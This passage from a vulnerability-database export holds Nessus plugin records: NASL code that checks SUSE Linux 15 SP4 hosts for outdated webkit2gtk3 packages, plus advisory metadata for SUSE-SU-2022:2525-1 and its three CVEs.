script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLED_SAP15|SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(4)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED15 SP4\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLED_SAP15\" && (! preg(pattern:\"^(4)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED_SAP15 SP4\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(4)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP4\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(4)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP4\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libwebkit2gtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-4_1-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-4_1-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-5_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk-5_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk3-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk3-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk3-soup2-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'webkit2gtk3-soup2-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libjavascriptcoregtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libjavascriptcoregtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libjavascriptcoregtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-4_1-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'libwebkit2gtk-5_0-0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-JavaScriptCore-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2-5_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_1-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-4_1-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-4_1-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-5_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk-5_0-injected-bundles-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-development-tools-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk3-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk3-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-desktop-applications-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk3-soup2-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']},\n {'reference':'webkit2gtk3-soup2-devel-2.36.4-150400.4.6.2', 'sp':'4', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.4', 'sle-module-basesystem-release-15.4', 'sled-release-15.4', 'sles-release-15.4']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_1-0 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T08:44:57", "description": "The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:2525-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-23T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2525-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2023-07-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-2525-1.NASL", "href": "https://www.tenable.com/plugins/nessus/163420", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:2525-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163420);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/13\");\n\n script_cve_id(\"CVE-2022-22662\", \"CVE-2022-22677\", \"CVE-2022-26710\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:2525-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2525-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by\nmultiple vulnerabilities as referenced in the SUSE-SU-2022:2525-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue\n is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be\n interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1201221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-26710\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-July/011626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?39df4b99\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22662\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26710\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) 